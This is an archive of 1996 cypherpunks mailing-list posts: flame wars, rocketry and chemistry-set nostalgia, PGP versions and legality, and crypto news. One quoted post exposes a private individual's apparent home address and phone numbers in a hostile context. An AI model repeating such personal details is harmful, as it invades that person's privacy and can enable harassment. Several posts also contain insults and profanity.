surprise, although is often difficult for them to see or agree with.  

I recommend that you go through the archives and do a little light
reading.  Your mind will soon be saturated with the flavor of the
underlying theme, and you will Understand.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 5 Dec 1996 11:13:38 -0800 (PST)
To: Dale Thorn <logos@c2.net>
Subject: Re: Logos -vs- Vulis
In-Reply-To: <32A67717.1E5D@gte.net>
Message-ID: <199612051913.MAA29639@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

In <32A67717.1E5D@gte.net>, on 12/04/96 
   at 11:17 PM, Dale Thorn <dthorn@gte.net> said:

::I understand that you don't want to nit-pick *every* bit of every post,
::however, once you do decide to pick on somebody, surely you could point
::to the specific fallacies, rather than wring your hands and gnash your
::teeth as you did in the long note to the Great Expelled One.
::
        hey, logos wants to perform a service.  however, let's keep the
    wailing, weeping, and gnashing of teeth on the sidelines with direct
    mail to the group involved instead of cluttering the list with yet 
    more noise (like this waste of time).

::Don't think I don't know what's going on here. I got permanently
::expelled from two schools as a youth, to name just two examples from my
::illustrious career, yet after learning how to play the game, I probably
::am doing much better than most of the drones who completed their studies
::and kept their mouths shut.  My life is continually interesting, and I
::wouldn't think of trading it for the neurotic, control-freak-mentality
::lifestyle certain folks around here "enjoy".
::
    you're not unusual, in the first place since many high performers 
    just were not willing to waste time in a slow paced and probably
    parochial (not religion connotation) school.

    as for a the attitude, Dale has carried right on without taking
    a break.  as for being less wired and neurotic, I doubt it --Dale's
    into big time, including picking on anyone who he deems inferior
    and or maybe even "Children of a Lesser god."

::I'm sure (if you know crypto topics) you realize that in creating a
::crypto solution, there's no substitute for rigorous attention to detail. 
::I'm not opposed to paying some attention to decorum, but logic comes
::first, otherwise, you won't have a leg to stand on.
::
    and to prove your own point --but not in your favour:  since when
    did logic preclude decorum. that's sort of follows the rule:

        "profanity is the refuge of inarticulate motherfuckers."

    when you blow you own logic by being profanely indecorus. And I'll
    say it again, and again:

        if the residents of cypherpunk land can not express themselves
    with respect for their colleages, even in disagreement, then cp is
    a has been and will be quoted in ridicule by the news organizations
    and the Congress as an anarchistic bunch of uncivilized and uncouth
    barbarians screaming "cryptography and anarchy for the masses."

        Is that what you want?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqcc3L04kQrCC2kFAQHObQP/X6CJaH21BMssKXNXWFaAhR24Vs/aqtp4
W/a/QUC8Us5EBTUmdAW7DZo241DJJE0y/eNI3DQHspVBwfXTmJIEDX4cluoe9aP4
wdQNw2U+y/TNP1bWiOvincOEaevwwS/v55uaCyUHBMmZZo8y8Xi8Zyac8fzBvpkX
ggzsnDTtjqU=
=Re0l
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Dec 1996 19:08:12 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Stinger Specs
Message-ID: <v02140b03aecd2e8879d2@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Stinger (AIM-92)  (Jane's #: 6604.331)
>152 x 7-14 cm  (l x d - span)
>Weight: 18 kg
>Warhead: HE
>Propulsion: Solid
>Range: 2-4 km
>Guidance: IR
>
>Exact effective range / altitude is not listed in the quick guide I have
>on my desk.  I will pull it out of a larger volume when I have time.
>

When I was doing my undergraduate work several of us built a heat-seeking
and homing circuit which we subsequently tested in a small (24-inch) solid
propellent rocket.  Four CO-2 cooled germanium sensors picked up radiation
from a small flat-topped piramidal mirror which drove fin servos to 'null'
onto (place its image atop the piramid) the heat source. One evening we
were able to 'shoot down' a lit cigarette tied to fence up in the hills
near the college from a distance of about 1/4-mile.

For some time we considered making available 'Visible Missile" plans/kits,
for a  few hundred dollars, which had everything except the easily obtained
zinc-sulphur propellent (would this be illegal given the laws passed since
the '70s?) so those interested in IR missile technology could learn from a
functioning testbed.  I did quite a bit of serious amateur rocketry in my
teen years through the Northrup Rocketry Club (So. Cal) and launches at a
site near Edwards AFB (they were happy to track our launches and make sure
there was no aircraft hazzard). Our 24-inch rockets reached speeds of over
1000 mph in about 1 second and altitudes of about 10,000 ft.  48-inch
rockets (still small enough for shoulder launch) could reach over Mach 2
and altitude/ranges of about 50,000 ft (all figures insignificant
payloads).

I'm certain I and many of my friends got much of our interest for math and
science and subsequent academic success from such hands-on activities which
were encouraged or supported by teachers, parents, corporations and the
government.  We were forced to solve real chemistry, math, engineering,
physics and material science problems.  This has all vanished is our zeal
to protect youth and society from any activity which might lead injury or
misuse.  I can't even find a place to buy a niece a real chemistry set as
tort laws have forced them from the market.  When considering the plumeting
interest and achievement of our youth in math and science we look nor
further for a reason.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:56:18 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Intellectual dishonesty
Message-ID: <849884540.522598.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Paul tries to suppress the discussion of crypto on this list. Before I gave up
> on this list completely, I used to think that it's a veru evil thing to do.

I very much doubt you have anyone whatsoever to agree with you on 
this. I very rarely post anything that is not crypto-relevant to this 
list, apart from my occasional indulgance in flaming people.

> Even if there are problems with Don Wood's IPG cryptoscheme (something I don't
> know to be true until I find the time to look at it myself), it's outright
> evil to harrass Don the way Paul did. It's clear that Don knows more about the
> field of cryptography than most people remaining on this mailing list. 

Don has a record of creating noise and flames on this list because he 
incites them, when someone refuses for example, to admit that a 
software generated random number stream is not a one time pad there 
is very little one can do to maintain a sensible discussion on the 
matter. Once Don conceded his system was not a one time pad I stopped 
protesting. As for Dons knowledge about cryptography I seem to 
remember him once promising to sell his company for $1 if his 
previous cryptosystem was broken which it summarily was. True, my 
flames of Don have maybe been a little more vitriolic than strictly 
necessary but he did ask for it..

> to on this list. Would you submit the authors of the knapsack scheme to the
> same kind of abuse because it was broken? In fact, how many people are there
> still on this list who know what the knapsack scheme is?

No, because they would not for example initially claim the scheme 
was a one time pad then rant endlessly about QED and proofs of 
security based on statistical analysis of output data.
And as to your last question I for one do know what the knapsack 
scheme is, its a pity there were weaknesses as it was an elegant 
cryptosystem.

> The work of this list appears to be character assassination. If people like
> Paul Bradley and Tim May insist on slandering people and trying to harm their
> professional reputations (see the thread on "don't hire" lists), I will do my
> best to defend them and their freedom of speech, and to expose the likes of
> Paul Bradley - an ignorant buffoon out to silence anyone who knows more about
> the field than he does.

I am neither ignorant nor out to silence people. My knowledge of 
cryptography as compared to yours is not the issue, I post 
information and answers to questions that are of worth to the other 
members of the list, your knowledge of cryptography may be better or 
worse than my own, however, you have posted nothing crypto-relevant 
so we must assume you know very little.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fairbanks <apf@ma.ultranet.com>
Date: Thu, 5 Dec 1996 16:25:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199612060024.TAA01172@cinna.ultra.net>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Dec 1996 17:30:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 5.0??
In-Reply-To: <Pine.BSF.3.91.961204220740.16825A-100000@blacklodge.c2.net>
Message-ID: <9612060130.AA01059@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


someone writes:
>  Wrong!  You must telnet to all.net, but the correct logname
>  is "getpgp" with no password.  It will ask you some questions
>  (like are you a US citizen), and then give you an
>  export-controlled ftp directory to go to.
>
>  As far as I know, however, PGP 5.0 is still in beta test,
>  though you can get a snapshot from there (in source form only).
>  They also have source and binaries for the latest released
>  version of PGP 3.

what are you guys talking about???  AFAIK, the most current, released,  
version of PGP is 2.6.2.  Version 3 is not finished and anything you may get  
your hands on is a prerelease version.  PGP 4 and 5 simply don't exist!

...and isn't all.net the site of the Good Doctor Fred Cohen??


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 5 Dec 1996 17:01:03 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: [crypto] Avatar Protection?
Message-ID: <n1362306416.93551@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


_______________________________________________________________________________
From: Nelson Minar on Thu, Dec 5, 1996 19:00

>Ah, the age-old question. This is the same question as "is there a way
>for me to show a web page to someone and not let them copy it?", 

As a sidelight to this thread which has already strewn far from the 
[crypto] heading, it *is* possible to show a web page to someone w/out
letting them copy it.  Some guy in California, who touts the fact he has
"every foul word known to man" on his site (to generate more hits) has
(I believe developed/worked to help develop) a product which does so.  I
don't know how he does it, and I know there are ways around it through
sniffing, etc., but when you do the trivial act of "View Source" in 
Netscape, a filtered version is displayed in the source window.  While
it's really not possible (AFAIK) to eliminate unwanted copying by a person
who knows what they're doing, this works against people who don't (like 
most people).

If anyone's interested, I *might* be able to find the URL somewhere.

PM 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 5 Dec 1996 17:28:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612060114.AA15422@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


At 3:28 PM 12/4/1996, Andrew Loewenstern wrote:
>nobody writes:
>>  She is seen as "one of us" because she wrote a book on
>>  cryptography.  As a consequence, she is seen as a traitor.
>>  I am not endorsing this view.
>
>She didn't just write a book on cryptography, but several books.  She is also  
>the Chairperson (eek, PC titles...) of the CS department at Georgetown, a  
>very respectable institution, and has taught classes there on cryptology.  She  
>has also done research on crytpographic access control to databases and other  
>stuff.  So as far as being a cryptologist she is quite learned and should  
>deserve respect regardless of her political views.
>
>However, after reviewing the Skipjack algorithm (of course her being invited  
>to look at it was certainly due to her anti-strong-crypto-for-the-masses  
>views), she said something to the effect of "We looked at it over the weekend  
>and couldn't find anything wrong with it, so you should trust it." when she  
>knows damned well that you can't evaluate a cypher in three days.  It is for  
>this that she no longer deserves respect as a cryptologist.  She basically  
>cashed in her reputation-capital to help the U.S. Govt. dupe the American  
>people into buying Clipper.  Fortunately, we didn't buy it.

You make an excellent point.  Didn't Denning claim that they just
reviewed NSA's evaluation process?  Regardless, the claim that
SKIPJACK is therefore trustworthy is irresponsible.

Sir Galahad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 5 Dec 1996 20:41:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Science Generations
In-Reply-To: <v02140b03aecd2e8879d2@[10.0.2.15]>
Message-ID: <v03007800aecd4d8305f9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Steve brings us some important issues. Even a few crypto-related issues, later.

At 7:08 PM -0800 12/5/96, Steve Schear wrote:

>When I was doing my undergraduate work several of us built a heat-seeking
>and homing circuit which we subsequently tested in a small (24-inch) solid
....
>functioning testbed.  I did quite a bit of serious amateur rocketry in my
>teen years through the Northrup Rocketry Club (So. Cal) and launches at a
>site near Edwards AFB (they were happy to track our launches and make sure
....
>I'm certain I and many of my friends got much of our interest for math and
>science and subsequent academic success from such hands-on activities which
>were encouraged or supported by teachers, parents, corporations and the
>government.  We were forced to solve real chemistry, math, engineering,
>physics and material science problems.  This has all vanished is our zeal
>to protect youth and society from any activity which might lead injury or
>misuse.  I can't even find a place to buy a niece a real chemistry set as
>tort laws have forced them from the market.  When considering the plumeting
>interest and achievement of our youth in math and science we look nor
>further for a reason.

I never was seriously into rockets, but I sure was heavily into Gilbert
chemistry sets, making low-grade explosives, etc., and, as I shifted into
physics (around the 8th grade), into Tesla coils, radio emissions, plasmas,
tunnel diodes, etc.

(Tunnel diodes may seem low-tech to you Gen-X folks, given that Esaki's
invention never really changed the world as transistors did, but it was
amazing to me as a 10th grader to be experimenting with "quantum
tunneling." Your mileage may vary.)

I'm not sure if Gilbert chemistry sets went off the market for liablity
reasons, or for "lack of interest." The "4-banger" I had in 1961,
supplemented with varius Bunsen burners, arc furnaces, Erlenmayer flasks,
and whatnot, was amazing for its time. (And not terribly expensive, in case
some of the "social democrats" on this list are thinking I lived a

(I used to lie in bed at night, after my eyes adjusted to total darkness,
watching through the lens on my Gilbert "spinthariscope," watching the
flashes and trails of alpha particles striking the scintillator screen.
Little did I know then that these same alpha particles would make my career
15 years later.)

I believe there have been roughly (very roughly) three genarations of
"science kids":

* Generation 1: The kids of the 1920s-40s. The Ernest Lawrences and the
Robert Noyces, who grew up on farms, repairing tractors and farm machinery.
They learned about machinery at a direct level. These were the giants of
the post-war science community, and the founders of modern American chip
companies.

* Generation 2: The Sputnik generation, of the 1950s-60s. They grew up with
Gilbert chemistry sets, Erector sets, "All About" books, and with constant
exposure to nuclear physics, relativily, molecular biology, etc. These were
the workers who staffed the companies formed by the Noyces and Moores of
the world, and the young scientists who pioneered the use of computers.

* Generation 3: The computer generation. The 1970s-80s, who grew up with
Commodore PETs and Apple IIs (and some later machines). These are the "new
pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

(I could imagine expanding this to 4 or 5 "generations," but I think you
get the point. Being 44 years old, and almost 45, I claim no knowledge
about what the "latest generation" is all about. Maybe it's the "Beavis and
Butthead" generation...I don't know.)

--Tim May




Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 5 Dec 1996 20:47:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto hits the mainstream
Message-ID: <3.0.32.19961205203741.006d6b5c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



PC Magazine's web site has a prominent article reviewing four PC-based
crypto apps: they all seem to be oriented towards storage security not
communications security (to adopt Tim's taxonomy). The apps are from
Symantec, RSA, AT&T, and PGP; their "Editors' Choice" was Symantec's
program, followed closely by RSA's. They seem more concerned with speed and
user interface rather than the strength of the algorithms or their
implementations.

The article won't teach anyone who's read Applied Crypto anything new about
crypto, but it's neat to see that security is becoming a mainstream
concern. (It should have always been one.) There may very well be an
associated dead-tree version of the article as well, but I've lost touch
with the PC market.

The article is located at <http://www.pcmag.com/features/crypto/_open.htm>. 
 
--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 22:42:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dimitri IS Detweiler
In-Reply-To: <199612051916.LAA20806@abraham.cs.berkeley.edu>
Message-ID: <eLTHyD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@cypherpunks.ca (John Anonymous MacDonald) writes:

> Dimitri Vulis wrote:
>
> | He he he what is sauce for the goose is sauce for the gander blah blah
>   ^^^^^^^^
> | blah intellectual dishonesty blah blah blah typical logorrhetic "cypher
> | punk" can't spell his own nym politely.
>
> There we have it! PROOF that Dimitri is a tentacle of Detweiler.
> Own up Dimitri!  (sorry for the previous accusation Dale)

How do you know that Dale != me?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 5 Dec 1996 19:26:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP in Russia
In-Reply-To: <mJgHyD1w165w@bwalk.dm.com>
Message-ID: <199612060321.VAA06453@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> harka@nycmetro.com writes:
> > it's been asked before but I don't know the current answer: Is the use
> > of PGP legal in Russia? And if it's not, how are the chances of a
> > foreigner in Russia using it anyway to get away with it?
> 
> Cryptography is outlawed in Russia (search the archives for my articles
> circa April '95). You can probably get away with using it anyway, but
> they just might make an example out of you. :-)

Severity of Russian laws is compensated by lack of their enforcement.

I would not expect Russian authorities to look for people using PGP or 
even react to complaints that certain persons use it. They might use this
law to harass people for something else though.

Kinda similar to taking PGP on diskettes out of United States: it
is nominally illegal, but n oone bothers.

I AM NOT A LAWYER

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 5 Dec 1996 21:23:07 -0800 (PST)
To: azur@netcom.com (Steve Schear)
Subject: Re: Stinger Specs
Message-ID: <3.0.32.19961205212336.006a520c@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 12/5/96 -0800, Steve Schear wrote:
>This has all vanished is our zeal
>to protect youth and society from any activity which might lead injury or
>misuse.  I can't even find a place to buy a niece a real chemistry set as
>tort laws have forced them from the market.  When considering the plumeting
>interest and achievement of our youth in math and science we look nor
>further for a reason.

When Wernher von Braun (if the reader doesn't know who von Braun was, shame
on your teachers. Hint: first human on the Moon.) first became interested
in rocketry, he was a student of music. Classical piano, to be exact. He
got his hands on a book about using rockets for space exploration. To his
dismay, the book was full of mathematical equations. He went to his math
teacher, asking him for help with the equations. The teacher must have been
of help, since von Braun went on to become the single most knowledgable
person in his field. And no, it wasn't piano playing.

There is nothing like some real life challenges to spark a young person's
mind. Today, conducting the experiments that fueled von Braun's imagination
would be a felony. The mere posession of the chemicals he used in his early
twenties is illegal.

This country has set out on a project to dumb the minds of its young. With
great success.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Lawrence <foodie@netcom.com>
Date: Thu, 5 Dec 1996 22:07:51 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The Science Generations
In-Reply-To: <v02140b03aecd2e8879d2@[10.0.2.15]>
Message-ID: <v03007804aecd645dc5e4@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:44 PM -0800 on 12/5/96, Timothy C. May wrote:

> I'm not sure if Gilbert chemistry sets went off the market for liablity
> reasons, or for "lack of interest." The "4-banger" I had in 1961,
> supplemented with varius Bunsen burners, arc furnaces, Erlenmayer flasks,
> and whatnot, was amazing for its time. (And not terribly expensive, in case
> some of the "social democrats" on this list are thinking I lived a

I can provide a datapoint here. I started getting into chemistry
when I was about 8, which was in 1981. I can't remember the brand
name, but my first (and last, actually) 'value-added' kit was
designed to keep kids from doing anything that could be
dangerous, a fact tactfully explained on the packaging.

To solve that problem, my mother gave me an Edmund Scientific
catalog and a (severely limited, given my family background)
budget for whatever I wanted.

I ordered direct for supplies from then on.

> * Generation 3: The computer generation. The 1970s-80s, who grew up with
> Commodore PETs and Apple IIs (and some later machines). These are the "new
> pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

I would have killed for a computer growing up. I finally got one,
a Mac IIsi, when I went to college (I'm still paying off the
loan I took out to buy it. I gave it to someone when I got another
machine, and it will, if I'm not mistaken, retrieve this message
the next time a certain someone checks mail. That helps
me overlook the fact that I still owe more than the machine
is worth... I learned my lesson.)

There are many in my age bracket who play with non-computer
science; the relevent fact being that whatever the field
of study (I personally know folks doing research in bio, physics,
chemistry and economics (arguably not a science ;)), they all use
computers as a daily part of their work. You can run, but you can't
hide.

> (I could imagine expanding this to 4 or 5 "generations," but I think you
> get the point. Being 44 years old, and almost 45, I claim no knowledge
> about what the "latest generation" is all about. Maybe it's the "Beavis and
> Butthead" generation...I don't know.)

Yes, many of us are devoted to the study of Brute Force Insect
Dissection.

-j

> --Tim May

--
"I'm about to, or I am going to, die. Either expression is used."
                - Last words of Dominique Bouhours, Grammarian, 1702
____________________________________________________________________
Jamie Lawrence                                     foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 5 Dec 1996 22:28:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto hits the mainstream
In-Reply-To: <3.0.32.19961205203741.006d6b5c@mail.io.com>
Message-ID: <v03007800aecd6d32e538@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:48 PM -0800 12/5/96, Greg Broiles wrote:
>PC Magazine's web site has a prominent article reviewing four PC-based
>crypto apps: they all seem to be oriented towards storage security not
>communications security (to adopt Tim's taxonomy). The apps are from
...

A good way of putting things. I wann't thinking in terms of a strict
tanonomy of "storage" vs. "communications,: but this is certainly so. The
government wants access to our _commuinications_,, while it is our
_storage_ that we as users are interested in protected.

(Not that I grant them access to "storage," but it's important to point out
that their claims about helping to protect ciitizen-units are bogus, too.)


--Tim


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 22:40:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Arsen
Message-ID: <7XXHyD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


An unknown person asked:

> >Arsen vainly insisted on listing his name in InterNIC's database as RA1215
> >(unusual for someone supposedly interested in privacy). Arsen listed a phone
> >number (+1 718 786 4227) which is apparently at his parents' residence (48-2
> >40th St, Apt 2B, Calvary, NY 11104-4111) and a fax number (+1 212 725 6559).
>
> Where does one find information to recreate your research?  I was all
> over
> InterNIC's websight but could not find anything on RA1215 or Arsen, let
> alone
> a phone number.  Don't these information services rely on user
> volunteering
> information.  If not, how do I make this information about myself
> secure?

Your tcp/ip package should have a program called 'whois', which goes to
internic and searches its database. I'm not sure if MS includes it in NT or
whatever you're using... If you can't find it, just telnet to internic.net or
rs.internic.net port 43 (important!) and type the string you want to search
for. Save the output - it closes the telnet connection after sending it.
Yes, it relies on people supplying the information about themselves.
Some folks are pretty paranoid about. E.g., fingering unicorn@uiuc.edu says:

]----------------------------------------
]       name: You may not view this field.
] department: You may not view this field.
]      title: You may not view this field.
]      phone: You may not view this field.
]    address: You may not view this field.
]      other: You may not view this field.
]   email to: unicorn@uiuc.edu (Not present in entry.)
] public_key:
]You may not view this field.
]----------------------------------------

May not view the public key? Come on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 5 Dec 1996 22:57:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Red Letter Day
Message-ID: <199612060657.WAA19189@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An entirely on-topic post from Dimitri:

>To: cypherpunks@toad.com
>Subject: Re: PGP in Russia
>From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Comments: All power to the ZOG!
>Date: Thu, 05 Dec 96 16:36:33 EST
>Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>harka@nycmetro.com writes:
>
>> Hi there,
>> 
>> it's been asked before but I don't know the current answer: Is the use
>> of PGP legal in Russia? And if it's not, how are the chances of a
>> foreigner in Russia using it anyway to get away with it?
>
>Cryptography is outlawed in Russia (search the archives for my articles
>circa April '95). You can probably get away with using it anyway, but
>they just might make an example out of you. :-)
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>

-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Thu, 5 Dec 1996 17:18:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP Tools for Linux
Message-ID: <Pine.3.89.9612052310.A308-0100000@marui>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

Now that I'm back in Europe I've been able to do some more work on Privtool
(PGP-aware mail-reader for X11 on SunOS/Solaris, Linux and FreeBSD) and
should be releasing version 0.86 once I've fixed the last segmentation fault
(see my Web site for details of the latest changes). 

In the meantime I've finally got around to fixing one of the early PGP Tools
versions that escaped to Europe so that it works on Linux (and probably
FreeBSD). I'm just about to upload pgptools.linux.1.0.tar.gz to
utopia.hacktic.nl and idea.sec.dsi.unimi.it, so it should be available there
shortly. 

I'm not back on the list yet, so send any mail to this address.

	Mark

|-----------------------------------------------------------------------|
|Mark Grant M.A., U.L.C.	  	       EMAIL: mark@unicorn.com  |
|WWW: http://www.c2.org/~mark	  	       MAILBOT: bot@unicorn.com	|
|-----------------------------------------------------------------------|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 5 Dec 1996 23:23:50 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The Science Generations
Message-ID: <199612060723.XAA21230@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:44 PM 12/5/96 -0800, Timothy C. May wrote:
>* Generation 1: The kids of the 1920s-40s. The Ernest Lawrences and the
>Robert Noyces, who grew up on farms, repairing tractors and farm machinery.
>They learned about machinery at a direct level. These were the giants of
>the post-war science community, and the founders of modern American chip
>companies.
>
>* Generation 2: The Sputnik generation, of the 1950s-60s. They grew up with
>Gilbert chemistry sets, Erector sets, "All About" books, and with constant
>exposure to nuclear physics, relativily, molecular biology, etc. These were
>the workers who staffed the companies formed by the Noyces and Moores of
>the world, and the young scientists who pioneered the use of computers.
>
>* Generation 3: The computer generation. The 1970s-80s, who grew up with
>Commodore PETs and Apple IIs (and some later machines). These are the "new
>pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

I am definitly from Generation 2.  I have tried to interest my children in
playing with ICs and various electronic pieces.  I have also worked
hand-in-hand with them, rebuilding auto engines and transmissions.  We will
see how it plays out.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 5 Dec 1996 23:41:43 -0800 (PST)
To: "lurker@mail.tcbi.com>
Subject: Re: (null)
Message-ID: <19961206073720359.AAA122@gigante>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 04 Dec 1996 17:33:59 -0600, Lurker wrote:

>Could someone tell me where I can find a text file of *all* usenet newsgroups?

Check www.spam-monkeys.com.


If you use a Un*x based newsreader, they should have some sort of .newsrc
file available.

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jc105558@spruce.hsu.edu
Date: Fri, 6 Dec 1996 00:24:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: cypher-PUNKS...
Message-ID: <009AC690.10DDC280.3@SPRUCE.HSU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I am writing this post to inform subcsribers of this list of the problems I 
have seen in this service.  The number one problem being off subject discussion
I understand that the name of this is cypherpunks, but why not put a little
more cypher and a lot less punk.  I can understand how it can all get started
One person posts some intelligent information.  Then another replys dissagreeing
with the original sender.  Then the sender takes it personally, and feels a need
to flame the other.  There is nothing wrong with flaming a bit, but for the 
name-sake of this mailer, please post more realevent (or at least interesting)
information.  Logos take a chill pill.  You aren't a policeman.   Tim May, do 
you have anything on subject to discuss?

Allright, enough about that.

I have a heard of a new encryption style called something like "Zone-redundant"
